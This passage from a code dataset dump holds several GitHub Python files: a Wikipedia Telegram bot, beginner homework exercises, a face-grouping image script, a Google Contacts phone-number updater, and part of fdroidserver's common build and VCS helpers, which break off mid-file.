types.Message):\r\n \"\"\"\r\n This handler will be called when user sends `/start` or `/help` command\r\n \"\"\"\r\n await message.reply(\"Foydalanish uchun izlayotgan maqolangizga doir so'z yuboring!\")\r\n\r\n\r\n@dp.message_handler()\r\nasync def wikiyubor(message: types.Message):\r\n try:\r\n respond = wikipedia.summary(message.text)\r\n await message.answer(respond)\r\n except:\r\n await message.reply('Malumot topilmadi')\r\n\r\n # old style:\r\n # await bot.send_message(message.chat.id, message.text)\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp, skip_updates=True)","repo_name":"goldstar2705/goldwiki","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5354970879","text":"#exersise 1\n\ndef address_book():\n book = {}\n while True:\n key_name = input('What is the name of the person you would like to add to your address book? ')\n if key_name not in book:\n book[key_name] = input(f\"What is {key_name}'s address? \")\n else:\n current_address = input(\n f\"The address we have on file for this person is {key_name.get()}. Is this correct? y/n\")\n if current_address == 'n':\n new_address = input(f\"What is {key_name}'s new address? \")\n book[key_name] = new_address\n else:\n print(\"Great! Thank you for confirming.\")\n next = input(\"Would you like to add another person to the address book? y/n \")\n if next == 'n':\n break\n for key, value in book.items():\n return f\"{key} lives at {value}\"\n\naddress_book()\nbook = {}\n\n\n\n#exersise 2\nperson1 = ['09:00', '10:30', '11:30', '12:00', '13:00', '14:30']\nperson2 = ['09:30', '10:00', '10:30', '12:00', '14:30', '16:00']\nperson3 = ['09:00', '09:30', '11:00', '11:30', '12:00', '13:30', '14:30', '15:00']\nperson4 = ['11:00', '11:30', '12:00', '14:00', '14:30', '16:30', '17:00']\n\ndef avail_meet_times(original_list, *args):\n orig_set = set(original_list)\n # print(orig_set)\n for person_avail in args:\n avail_set = set(person_avail)\n orig_set = orig_set.intersection(avail_set)\n print(orig_set)\n\n\navail_meet_times(person1, person2, person3, person4)","repo_name":"vovan2101/week2-day5-homework","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4125939533","text":"# First, you need to install the required libraries: requests, opencv-python-headless, and face_recognition.\n# You can install face_recognition by running !pip install face_recognition\n\nimport os\nimport requests\nimport shutil\nimport cv2\nimport face_recognition\n\n# Function to download images from a URL and save them locally\ndef download_images(url_list):\n \n for idx, url in enumerate(url_list):\n response = requests.get(url, stream=True)\n with open(f'image_{idx}.jpg', 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n \n print('Images downloaded')\n \n# Function to find faces in images and save them as thumbnail in a local folder\ndef identify_and_save_faces():\n \n # Global variables to keep track of the identified faces and their path location\n known_face_encodings = []\n known_face_paths = []\n\n for filename in os.listdir():\n if filename.endswith('.jpg'):\n \n img_path = os.path.abspath(filename)\n img = cv2.imread(img_path)\n\n rgb_img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n face_locations = face_recognition.face_locations(rgb_img)\n face_encodings = face_recognition.face_encodings(rgb_img, face_locations)\n \n if face_encodings:\n # Save the face thumbnail in a local folder\n top, right, bottom, left = face_locations[0]\n name = f\"{filename.split('.')[0]}_{top}_{right}_{bottom}_{left}\"\n cv2.imwrite(f'faces/{name}.jpg', img[top:bottom, left:right])\n \n # Identify if it's the first time the face is found or make a new group if already identified\n face_found = False\n for i, encoding in enumerate(known_face_encodings):\n match = face_recognition.compare_faces([encoding], face_encodings[0])\n if match[0]:\n face_found = True\n shutil.move(img_path, known_face_paths[i])\n break\n \n if not face_found:\n known_face_encodings.append(face_encodings[0])\n known_face_paths.append(os.path.abspath(f\"faces/{name}.jpg\"))\n os.makedirs(f\"faces/Group{len(known_face_paths)}\")\n shutil.move(img_path, known_face_paths[-1])\n \n else:\n # If no face is found just delete the image\n os.remove(img_path)\n\n print('Faces identified and saved') \n \n\n# Public repository urls where the script can get imagery, this is an example \nimage_urls = [\n 'https://www.publicdomainpictures.net/pictures/40000/nahled/plain-blue-background.jpg',\n 'https://www.publicdomainpictures.net/pictures/200000/nahled/sunrise-over-istanbul.jpg',\n 'https://www.publicdomainpictures.net/pictures/100000/nahled/tulips-in-bloom.jpg',\n 'https://www.publicdomainpictures.net/pictures/320000/nahled/seagull.jpg', \n 'https://www.publicdomainpictures.net/pictures/310000/nahled/shark-swimming-underwater.jpg',\n 'https://www.publicdomainpictures.net/pictures/190000/nahled/mountain-landscape.jpg',\n 'https://www.publicdomainpictures.net/pictures/150000/nahled/red-car.jpg', \n 'https://www.publicdomainpictures.net/pictures/170000/nahled/macaw.jpg',\n 'https://www.publicdomainpictures.net/pictures/10000/nahled/abstract-autumn-colors.jpg',\n 'https://www.publicdomainpictures.net/pictures/220000/nahled/cutlery-classic-kitchen-knife.jpg'\n]\n\n# Download the images\ndownload_images(image_urls)\n\n# Identify the faces in the images and save them as a thumbnail \nidentify_and_save_faces()\n\n# Delete the original images\nfor filename in os.listdir():\n if filename.endswith('.jpg'):\n os.remove(filename)\n\nprint(\"Process Complete\") \n","repo_name":"sarment0/face-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33589571402","text":"#!/usr/bin/env python\n# vi:ts=4:sw=4:et\n\n# Mass phone numbers updater for Google contacts.\n#\n# Example usage:\n#\n# ./gpu.py -u <user> -p <password> -s '-' '' -s ' ' '' -s '^0(\\d{9})$' '+33\\1'\n#\n# This would strip spaces and '-' characters, and format 10-digit phone\n# numbers starting with a 0 (supposedly french ones) to use the international\n# +33 ... notation (useful when you're traveling).\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__author__ = 'Maxime Henrion <mhenrion@gmail.com>'\n\nimport argparse\nimport re\n\n# GData related imports\nimport gdata.data\nimport gdata.contacts.data\nimport gdata.contacts.client\n\n# Known phone number types at the time of this writing (for display only).\nphone_types = {\n gdata.data.FAX_REL: 'fax',\n gdata.data.HOME_REL: 'home',\n gdata.data.HOME_FAX_REL: 'home fax',\n gdata.data.MOBILE_REL: 'mobile',\n gdata.data.OTHER_REL: 'other',\n gdata.data.PAGER_REL: 'pager',\n gdata.data.WORK_REL: 'work',\n gdata.data.WORK_FAX_REL: 'work fax'\n}\n\n# Return all contacts using python generators for convenience.\ndef get_all_contacts(client, size=128):\n query = gdata.contacts.client.ContactsQuery()\n query.start_index = 1\n query.max_results = size\n\n done = False\n while not done:\n feed = client.GetContacts(q=query)\n num = 0\n for contact in feed.entry:\n yield contact\n num += 1\n if num < size:\n done = True\n else:\n query.start_index += size\n\ndef update_contact(contact, subs):\n updates = []\n for phone in contact.phone_number:\n old = phone.text\n new = old\n for pattern, repl in subs:\n new = re.sub(pattern, repl, new)\n if new != old:\n phone.text = new\n updates.append((phone, old))\n return updates\n\ndef confirm(prompt, choices=None, default=None):\n if choices is None:\n choices = ('yY', 'nN')\n ans = raw_input(prompt)\n for i, choice in enumerate(choices):\n if ans in choice:\n return choice[0]\n return default\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=True)\nparser.add_argument('-p', '--password', required=True)\nparser.add_argument('-n', '--dry-run', action='store_true')\nparser.add_argument('-y', '--yes', action='store_true')\nparser.add_argument('-s', '--sub', nargs=2, action='append')\nargs = parser.parse_args()\n\nclient = gdata.contacts.client.ContactsClient(source='Mux-ContactsUpdater-1')\nclient.ClientLogin(args.user, args.password, client.source)\n\nfor contact in get_all_contacts(client):\n if contact.name is None:\n name = '(no name)'\n else:\n name = contact.name.full_name.text\n\n if not args.sub:\n if contact.phone_number:\n print('{0} :'.format(name))\n for phone in contact.phone_number:\n phone_type = phone_types.get(phone.rel, 'unknown')\n print(' {0} ({1})'.format(phone.text, phone_type))\n continue\n\n updates = update_contact(contact, args.sub)\n if not updates:\n continue\n\n print('Updating contact \"{0}\" :'.format(name))\n for phone, old in updates:\n phone_type = phone_types.get(phone.rel, 'unknown')\n print(' {0} -> {1} ({2})'.format(old, phone.text, phone_type))\n if args.dry_run:\n continue\n\n if not args.yes:\n key = confirm('Really update (N/y/a) ? ', ('nN', 'yY', 'aA'), 'n')\n if key == 'n':\n continue\n if key == 'a':\n args.yes = True\n\n # We should handle Etags mismatch here, but since this is intended to\n # be used as an interactive application, it doesn't really matter.\n client.Update(contact)\n","repo_name":"mux/stuff","sub_path":"gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11478564890","text":"import io\nimport os\nimport sys\nimport re\nimport shutil\nimport glob\nimport stat\nimport subprocess\nimport time\nimport operator\nimport logging\nimport hashlib\nimport socket\nimport base64\nimport xml.etree.ElementTree as XMLElementTree\n\nfrom queue import Queue\n\nfrom zipfile import ZipFile\n\nimport fdroidserver.metadata\nfrom .asynchronousfilereader import AsynchronousFileReader\n\n\nXMLElementTree.register_namespace('android', 'http://schemas.android.com/apk/res/android')\n\nconfig = None\noptions = None\nenv = None\norig_path = None\n\n\ndefault_config = {\n 'sdk_path': \"$ANDROID_HOME\",\n 'ndk_paths': {\n 'r9b': None,\n 'r10e': None,\n 'r11c': None,\n 'r12b': \"$ANDROID_NDK\",\n },\n 'qt_sdk_path': None,\n 'build_tools': \"24.0.2\",\n 'force_build_tools': False,\n 'java_paths': None,\n 'ant': \"ant\",\n 'mvn3': \"mvn\",\n 'gradle': 'gradle',\n 'accepted_formats': ['txt', 'yml'],\n 'sync_from_local_copy_dir': False,\n 'per_app_repos': False,\n 'make_current_version_link': True,\n 'current_version_name_source': 'Name',\n 'update_stats': False,\n 'stats_ignore': [],\n 'stats_server': None,\n 'stats_user': None,\n 'stats_to_carbon': False,\n 'repo_maxage': 0,\n 'build_server_always': False,\n 'keystore': 'keystore.jks',\n 'smartcardoptions': [],\n 'char_limits': {\n 'Summary': 80,\n 'Description': 4000,\n },\n 'keyaliases': {},\n 'repo_url': \"https://MyFirstFDroidRepo.org/fdroid/repo\",\n 'repo_name': \"My First FDroid Repo Demo\",\n 'repo_icon': \"fdroid-icon.png\",\n 'repo_description': '''\n This is a repository of apps to be used with FDroid. Applications in this\n repository are either official binaries built by the original application\n developers, or are binaries built from source by the admin of f-droid.org\n using the tools on https://gitlab.com/u/fdroid.\n ''',\n 'archive_older': 0,\n}\n\n\ndef setup_global_opts(parser):\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"Spew out even more information than normal\")\n parser.add_argument(\"-q\", \"--quiet\", action=\"store_true\", default=False,\n help=\"Restrict output to warnings and errors\")\n\n\ndef fill_config_defaults(thisconfig):\n for k, v in default_config.items():\n if k not in thisconfig:\n thisconfig[k] = v\n\n # Expand paths (~users and $vars)\n def expand_path(path):\n if path is None:\n return None\n orig = path\n path = os.path.expanduser(path)\n path = os.path.expandvars(path)\n if orig == path:\n return None\n return path\n\n for k in ['sdk_path', 'ant', 'mvn3', 'gradle', 'keystore', 'repo_icon']:\n v = thisconfig[k]\n exp = expand_path(v)\n if exp is not None:\n thisconfig[k] = exp\n thisconfig[k + '_orig'] = v\n\n # find all installed JDKs for keytool, jarsigner, and JAVA[6-9]_HOME env vars\n if thisconfig['java_paths'] is None:\n thisconfig['java_paths'] = dict()\n pathlist = []\n pathlist += glob.glob('/usr/lib/jvm/j*[6-9]*')\n pathlist += glob.glob('/usr/java/jdk1.[6-9]*')\n pathlist += glob.glob('/System/Library/Java/JavaVirtualMachines/1.[6-9].0.jdk')\n pathlist += glob.glob('/Library/Java/JavaVirtualMachines/*jdk*[6-9]*')\n if os.getenv('JAVA_HOME') is not None:\n pathlist.append(os.getenv('JAVA_HOME'))\n if os.getenv('PROGRAMFILES') is not None:\n pathlist += glob.glob(os.path.join(os.getenv('PROGRAMFILES'), 'Java', 'jdk1.[6-9].*'))\n for d in sorted(pathlist):\n if os.path.islink(d):\n continue\n j = os.path.basename(d)\n # the last one found will be the canonical one, so order appropriately\n for regex in [\n r'^1\\.([6-9])\\.0\\.jdk$', # OSX\n r'^jdk1\\.([6-9])\\.0_[0-9]+.jdk$', # OSX and Oracle tarball\n r'^jdk1\\.([6-9])\\.0_[0-9]+$', # Oracle Windows\n r'^jdk([6-9])-openjdk$', # Arch\n r'^java-([6-9])-openjdk$', # Arch\n r'^java-([6-9])-jdk$', # Arch (oracle)\n r'^java-1\\.([6-9])\\.0-.*$', # RedHat\n r'^java-([6-9])-oracle$', # Debian WebUpd8\n r'^jdk-([6-9])-oracle-.*$', # Debian make-jpkg\n r'^java-([6-9])-openjdk-[^c][^o][^m].*$', # Debian\n ]:\n m = re.match(regex, j)\n if not m:\n continue\n for p in [d, os.path.join(d, 'Contents', 'Home')]:\n if os.path.exists(os.path.join(p, 'bin', 'javac')):\n thisconfig['java_paths'][m.group(1)] = p\n\n for java_version in ('7', '8', '9'):\n if java_version not in thisconfig['java_paths']:\n continue\n java_home = thisconfig['java_paths'][java_version]\n jarsigner = os.path.join(java_home, 'bin', 'jarsigner')\n if os.path.exists(jarsigner):\n thisconfig['jarsigner'] = jarsigner\n thisconfig['keytool'] = os.path.join(java_home, 'bin', 'keytool')\n break # Java7 is preferred, so quit if found\n\n for k in ['ndk_paths', 'java_paths']:\n d = thisconfig[k]\n for k2 in d.copy():\n v = d[k2]\n exp = expand_path(v)\n if exp is not None:\n thisconfig[k][k2] = exp\n thisconfig[k][k2 + '_orig'] = v\n\n\ndef regsub_file(pattern, repl, path):\n with open(path, 'rb') as f:\n text = f.read()\n text = re.sub(bytes(pattern, 'utf8'), bytes(repl, 'utf8'), text)\n with open(path, 'wb') as f:\n f.write(text)\n\n\ndef read_config(opts, config_file='config.py'):\n \"\"\"Read the repository config\n\n The config is read from config_file, which is in the current\n directory when any of the repo management commands are used. If\n there is a local metadata file in the git repo, then config.py is\n not required, just use defaults.\n\n \"\"\"\n global config, options\n\n if config is not None:\n return config\n\n options = opts\n\n config = {}\n\n if os.path.isfile(config_file):\n logging.debug(\"Reading %s\" % config_file)\n with io.open(config_file, \"rb\") as f:\n code = compile(f.read(), config_file, 'exec')\n exec(code, None, config)\n elif len(get_local_metadata_files()) == 0:\n logging.critical(\"Missing config file - is this a repo directory?\")\n sys.exit(2)\n\n # smartcardoptions must be a list since its command line args for Popen\n if 'smartcardoptions' in config:\n config['smartcardoptions'] = config['smartcardoptions'].split(' ')\n elif 'keystore' in config and config['keystore'] == 'NONE':\n # keystore='NONE' means use smartcard, these are required defaults\n config['smartcardoptions'] = ['-storetype', 'PKCS11', '-providerName',\n 'SunPKCS11-OpenSC', '-providerClass',\n 'sun.security.pkcs11.SunPKCS11',\n '-providerArg', 'opensc-fdroid.cfg']\n\n if any(k in config for k in [\"keystore\", \"keystorepass\", \"keypass\"]):\n st = os.stat(config_file)\n if st.st_mode & stat.S_IRWXG or st.st_mode & stat.S_IRWXO:\n logging.warn(\"unsafe permissions on {0} (should be 0600)!\".format(config_file))\n\n fill_config_defaults(config)\n\n for k in [\"keystorepass\", \"keypass\"]:\n if k in config:\n write_password_file(k)\n\n for k in [\"repo_description\", \"archive_description\"]:\n if k in config:\n config[k] = clean_description(config[k])\n\n if 'serverwebroot' in config:\n if isinstance(config['serverwebroot'], str):\n roots = [config['serverwebroot']]\n elif all(isinstance(item, str) for item in config['serverwebroot']):\n roots = config['serverwebroot']\n else:\n raise TypeError('only accepts strings, lists, and tuples')\n rootlist = []\n for rootstr in roots:\n # since this is used with rsync, where trailing slashes have\n # meaning, ensure there is always a trailing slash\n if rootstr[-1] != '/':\n rootstr += '/'\n rootlist.append(rootstr.replace('//', '/'))\n config['serverwebroot'] = rootlist\n\n return config\n\n\ndef find_sdk_tools_cmd(cmd):\n '''find a working path to a tool from the Android SDK'''\n\n tooldirs = []\n if config is not None and 'sdk_path' in config and os.path.exists(config['sdk_path']):\n # try to find a working path to this command, in all the recent possible paths\n if 'build_tools' in config:\n build_tools = os.path.join(config['sdk_path'], 'build-tools')\n # if 'build_tools' was manually set and exists, check only that one\n configed_build_tools = os.path.join(build_tools, config['build_tools'])\n if os.path.exists(configed_build_tools):\n tooldirs.append(configed_build_tools)\n else:\n # no configed version, so hunt known paths for it\n for f in sorted(os.listdir(build_tools), reverse=True):\n if os.path.isdir(os.path.join(build_tools, f)):\n tooldirs.append(os.path.join(build_tools, f))\n tooldirs.append(build_tools)\n sdk_tools = os.path.join(config['sdk_path'], 'tools')\n if os.path.exists(sdk_tools):\n tooldirs.append(sdk_tools)\n sdk_platform_tools = os.path.join(config['sdk_path'], 'platform-tools')\n if os.path.exists(sdk_platform_tools):\n tooldirs.append(sdk_platform_tools)\n tooldirs.append('/usr/bin')\n for d in tooldirs:\n if os.path.isfile(os.path.join(d, cmd)):\n return os.path.join(d, cmd)\n # did not find the command, exit with error message\n ensure_build_tools_exists(config)\n\n\ndef test_sdk_exists(thisconfig):\n if 'sdk_path' not in thisconfig:\n if 'aapt' in thisconfig and os.path.isfile(thisconfig['aapt']):\n return True\n else:\n logging.error(\"'sdk_path' not set in config.py!\")\n return False\n if thisconfig['sdk_path'] == default_config['sdk_path']:\n logging.error('No Android SDK found!')\n logging.error('You can use ANDROID_HOME to set the path to your SDK, i.e.:')\n logging.error('\\texport ANDROID_HOME=/opt/android-sdk')\n return False\n if not os.path.exists(thisconfig['sdk_path']):\n logging.critical('Android SDK path \"' + thisconfig['sdk_path'] + '\" does not exist!')\n return False\n if not os.path.isdir(thisconfig['sdk_path']):\n logging.critical('Android SDK path \"' + thisconfig['sdk_path'] + '\" is not a directory!')\n return False\n for d in ['build-tools', 'platform-tools', 'tools']:\n if not os.path.isdir(os.path.join(thisconfig['sdk_path'], d)):\n logging.critical('Android SDK path \"%s\" does not contain \"%s/\"!' % (\n thisconfig['sdk_path'], d))\n return False\n return True\n\n\ndef ensure_build_tools_exists(thisconfig):\n if not test_sdk_exists(thisconfig):\n sys.exit(3)\n build_tools = os.path.join(thisconfig['sdk_path'], 'build-tools')\n versioned_build_tools = os.path.join(build_tools, thisconfig['build_tools'])\n if not os.path.isdir(versioned_build_tools):\n logging.critical('Android Build Tools path \"'\n + versioned_build_tools + '\" does not exist!')\n sys.exit(3)\n\n\ndef write_password_file(pwtype, password=None):\n '''\n writes out passwords to a protected file instead of passing passwords as\n command line argments\n '''\n filename = '.fdroid.' + pwtype + '.txt'\n fd = os.open(filename, os.O_CREAT | os.O_TRUNC | os.O_WRONLY, 0o600)\n if password is None:\n os.write(fd, config[pwtype].encode('utf-8'))\n else:\n os.write(fd, password.encode('utf-8'))\n os.close(fd)\n config[pwtype + 'file'] = filename\n\n\ndef get_local_metadata_files():\n '''get any metadata files local to an app's source repo\n\n This tries to ignore anything that does not count as app metdata,\n including emacs cruft ending in ~ and the .fdroid.key*pass.txt files.\n\n '''\n return glob.glob('.fdroid.[a-jl-z]*[a-rt-z]')\n\n\n# Given the arguments in the form of multiple appid:[vc] strings, this returns\n# a dictionary with the set of vercodes specified for each package.\ndef read_pkg_args(args, allow_vercodes=False):\n\n vercodes = {}\n if not args:\n return vercodes\n\n for p in args:\n if allow_vercodes and ':' in p:\n package, vercode = p.split(':')\n else:\n package, vercode = p, None\n if package not in vercodes:\n vercodes[package] = [vercode] if vercode else []\n continue\n elif vercode and vercode not in vercodes[package]:\n vercodes[package] += [vercode] if vercode else []\n\n return vercodes\n\n\n# On top of what read_pkg_args does, this returns the whole app metadata, but\n# limiting the builds list to the builds matching the vercodes specified.\ndef read_app_args(args, allapps, allow_vercodes=False):\n\n vercodes = read_pkg_args(args, allow_vercodes)\n\n if not vercodes:\n return allapps\n\n apps = {}\n for appid, app in allapps.items():\n if appid in vercodes:\n apps[appid] = app\n\n if len(apps) != len(vercodes):\n for p in vercodes:\n if p not in allapps:\n logging.critical(\"No such package: %s\" % p)\n raise FDroidException(\"Found invalid app ids in arguments\")\n if not apps:\n raise FDroidException(\"No packages specified\")\n\n error = False\n for appid, app in apps.items():\n vc = vercodes[appid]\n if not vc:\n continue\n app.builds = [b for b in app.builds if b.vercode in vc]\n if len(app.builds) != len(vercodes[appid]):\n error = True\n allvcs = [b.vercode for b in app.builds]\n for v in vercodes[appid]:\n if v not in allvcs:\n logging.critical(\"No such vercode %s for app %s\" % (v, appid))\n\n if error:\n raise FDroidException(\"Found invalid vercodes for some apps\")\n\n return apps\n\n\ndef get_extension(filename):\n base, ext = os.path.splitext(filename)\n if not ext:\n return base, ''\n return base, ext.lower()[1:]\n\n\ndef has_extension(filename, ext):\n _, f_ext = get_extension(filename)\n return ext == f_ext\n\n\napk_regex = re.compile(r\"^(.+)_([0-9]+)\\.apk$\")\n\n\ndef clean_description(description):\n 'Remove unneeded newlines and spaces from a block of description text'\n returnstring = ''\n # this is split up by paragraph to make removing the newlines easier\n for paragraph in re.split(r'\\n\\n', description):\n paragraph = re.sub('\\r', '', paragraph)\n paragraph = re.sub('\\n', ' ', paragraph)\n paragraph = re.sub(' {2,}', ' ', paragraph)\n paragraph = re.sub('^\\s*(\\w)', r'\\1', paragraph)\n returnstring += paragraph + '\\n\\n'\n return returnstring.rstrip('\\n')\n\n\ndef apknameinfo(filename):\n filename = os.path.basename(filename)\n m = apk_regex.match(filename)\n try:\n result = (m.group(1), m.group(2))\n except AttributeError:\n raise FDroidException(\"Invalid apk name: %s\" % filename)\n return result\n\n\ndef getapkname(app, build):\n return \"%s_%s.apk\" % (app.id, build.vercode)\n\n\ndef getsrcname(app, build):\n return \"%s_%s_src.tar.gz\" % (app.id, build.vercode)\n\n\ndef getappname(app):\n if app.Name:\n return app.Name\n if app.AutoName:\n return app.AutoName\n return app.id\n\n\ndef getcvname(app):\n return '%s (%s)' % (app.CurrentVersion, app.CurrentVersionCode)\n\n\ndef getvcs(vcstype, remote, local):\n if vcstype == 'git':\n return vcs_git(remote, local)\n if vcstype == 'git-svn':\n return vcs_gitsvn(remote, local)\n if vcstype == 'hg':\n return vcs_hg(remote, local)\n if vcstype == 'bzr':\n return vcs_bzr(remote, local)\n if vcstype == 'srclib':\n if local != os.path.join('build', 'srclib', remote):\n raise VCSException(\"Error: srclib paths are hard-coded!\")\n return getsrclib(remote, os.path.join('build', 'srclib'), raw=True)\n if vcstype == 'svn':\n raise VCSException(\"Deprecated vcs type 'svn' - please use 'git-svn' instead\")\n raise VCSException(\"Invalid vcs type \" + vcstype)\n\n\ndef getsrclibvcs(name):\n if name not in fdroidserver.metadata.srclibs:\n raise VCSException(\"Missing srclib \" + name)\n return fdroidserver.metadata.srclibs[name]['Repo Type']\n\n\nclass vcs:\n\n def __init__(self, remote, local):\n\n # svn, git-svn and bzr may require auth\n self.username = None\n if self.repotype() in ('git-svn', 'bzr'):\n if '@' in remote:\n if self.repotype == 'git-svn':\n raise VCSException(\"Authentication is not supported for git-svn\")\n self.username, remote = remote.split('@')\n if ':' not in self.username:\n raise VCSException(\"Password required with username\")\n self.username, self.password = self.username.split(':')\n\n self.remote = remote\n self.local = local\n self.clone_failed = False\n self.refreshed = False\n self.srclib = None\n\n def repotype(self):\n return None\n\n # Take the local repository to a clean version of the given revision, which\n # is specificed in the VCS's native format. Beforehand, the repository can\n # be dirty, or even non-existent. If the repository does already exist\n # locally, it will be updated from the origin, but only once in the\n # lifetime of the vcs object.\n # None is acceptable for 'rev' if you know you are cloning a clean copy of\n # the repo - otherwise it must specify a valid revision.\n def gotorevision(self, rev, refresh=True):\n\n if self.clone_failed:\n raise VCSException(\"Downloading the repository already failed once, not trying again.\")\n\n # The .fdroidvcs-id file for a repo tells us what VCS type\n # and remote that directory was created from, allowing us to drop it\n # automatically if either of those things changes.\n fdpath = os.path.join(self.local, '..',\n '.fdroidvcs-' + os.path.basename(self.local))\n fdpath = os.path.normpath(fdpath)\n cdata = self.repotype() + ' ' + self.remote\n writeback = True\n deleterepo = False\n if os.path.exists(self.local):\n if os.path.exists(fdpath):\n with open(fdpath, 'r') as f:\n fsdata = f.read().strip()\n if fsdata == cdata:\n writeback = False\n else:\n deleterepo = True\n logging.info(\"Repository details for %s changed - deleting\" % (\n self.local))\n else:\n deleterepo = True\n logging.info(\"Repository details for %s missing - deleting\" % (\n self.local))\n if deleterepo:\n shutil.rmtree(self.local)\n\n exc = None\n if not refresh:\n self.refreshed = True\n\n try:\n self.gotorevisionx(rev)\n except FDroidException as e:\n exc = e\n\n # If necessary, write the .fdroidvcs file.\n if writeback and not self.clone_failed:\n os.makedirs(os.path.dirname(fdpath), exist_ok=True)\n with open(fdpath, 'w+') as f:\n f.write(cdata)\n\n if exc is not None:\n raise exc\n\n # Derived classes need to implement this. It's called once basic checking\n # has been performend.\n def gotorevisionx(self, rev):\n raise VCSException(\"This VCS type doesn't define gotorevisionx\")\n\n # Initialise and update submodules\n def initsubmodules(self):\n raise VCSException('Submodules not supported for this vcs type')\n\n # Get a list of all known tags\n def gettags(self):\n if not self._gettags:\n raise VCSException('gettags not supported for this vcs type')\n rtags = []\n for tag in self._gettags():\n if re.match('[-A-Za-z0-9_. /]+$', tag):\n rtags.append(tag)\n return rtags\n\n # Get a list of all the known tags, sorted from newest to oldest\n def latesttags(self):\n raise VCSException('latesttags not supported for this vcs type')\n\n # Get current commit reference (hash, revision, etc)\n def getref(self):\n raise VCSException('getref not supported for this vcs type')\n\n # Returns the srclib (name, path) used in setting up the current\n # revision, or None.\n def getsrclib(self):\n return self.srclib\n\n\nclass vcs_git(vcs):\n\n def repotype(self):\n return 'git'\n\n # If the local directory exists, but is somehow not a git repository, git\n # will traverse up the directory tree until it finds one that is (i.e.\n # fdroidserver) and then we'll proceed to destroy it! This is called as\n # a safety check.\n def checkrepo(self):\n p = FDroidPopen(['git', 'rev-parse', '--show-toplevel'], cwd=self.local, output=False)\n result = p.output.rstrip()\n if not result.endswith(self.local):\n raise VCSException('Repository mismatch')\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n # Brand new checkout\n p = FDroidPopen(['git', 'clone', self.remote, self.local])\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git clone failed\", p.output)\n self.checkrepo()\n else:\n self.checkrepo()\n # Discard any working tree changes\n p = FDroidPopen(['git', 'submodule', 'foreach', '--recursive',\n 'git', 'reset', '--hard'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git reset failed\", p.output)\n # Remove untracked files now, in case they're tracked in the target\n # revision (it happens!)\n p = FDroidPopen(['git', 'submodule', 'foreach', '--recursive',\n 'git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n if not self.refreshed:\n # Get latest commits and tags from remote\n p = FDroidPopen(['git', 'fetch', 'origin'], cwd=self.local)\n if p.returncode != 0:\n raise VCSException(\"Git fetch failed\", p.output)\n p = FDroidPopen(['git', 'fetch', '--prune', '--tags', 'origin'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git fetch failed\", p.output)\n # Recreate origin/HEAD as git clone would do it, in case it disappeared\n p = FDroidPopen(['git', 'remote', 'set-head', 'origin', '--auto'], cwd=self.local, output=False)\n if p.returncode != 0:\n lines = p.output.splitlines()\n if 'Multiple remote HEAD branches' not in lines[0]:\n raise VCSException(\"Git remote set-head failed\", p.output)\n branch = lines[1].split(' ')[-1]\n p2 = FDroidPopen(['git', 'remote', 'set-head', 'origin', branch], cwd=self.local, output=False)\n if p2.returncode != 0:\n raise VCSException(\"Git remote set-head failed\", p.output + '\\n' + p2.output)\n self.refreshed = True\n # origin/HEAD is the HEAD of the remote, e.g. the \"default branch\" on\n # a github repo. Most of the time this is the same as origin/master.\n rev = rev or 'origin/HEAD'\n p = FDroidPopen(['git', 'checkout', '-f', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git checkout of '%s' failed\" % rev, p.output)\n # Get rid of any uncontrolled files left behind\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n\n def initsubmodules(self):\n self.checkrepo()\n submfile = os.path.join(self.local, '.gitmodules')\n if not os.path.isfile(submfile):\n raise VCSException(\"No git submodules available\")\n\n # fix submodules not accessible without an account and public key auth\n with open(submfile, 'r') as f:\n lines = f.readlines()\n with open(submfile, 'w') as f:\n for line in lines:\n if 'git@github.com' in line:\n line = line.replace('git@github.com:', 'https://github.com/')\n if 'git@gitlab.com' in line:\n line = line.replace('git@gitlab.com:', 'https://gitlab.com/')\n f.write(line)\n\n p = FDroidPopen(['git', 'submodule', 'sync'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git submodule sync failed\", p.output)\n p = FDroidPopen(['git', 'submodule', 'update', '--init', '--force', '--recursive'], cwd=self.local)\n if p.returncode != 0:\n raise VCSException(\"Git submodule update failed\", p.output)\n\n def _gettags(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'tag'], cwd=self.local, output=False)\n return p.output.splitlines()\n\n tag_format = re.compile(r'tag: ([^),]*)')\n\n def latesttags(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'log', '--tags',\n '--simplify-by-decoration', '--pretty=format:%d'],\n cwd=self.local, output=False)\n tags = []\n for line in p.output.splitlines():\n for tag in self.tag_format.findall(line):\n tags.append(tag)\n return tags\n\n\nclass vcs_gitsvn(vcs):\n\n def repotype(self):\n return 'git-svn'\n\n # If the local directory exists, but is somehow not a git repository, git\n # will traverse up the directory tree until it finds one that is (i.e.\n # fdroidserver) and then we'll proceed to destory it! This is called as\n # a safety check.\n def checkrepo(self):\n p = FDroidPopen(['git', 'rev-parse', '--show-toplevel'], 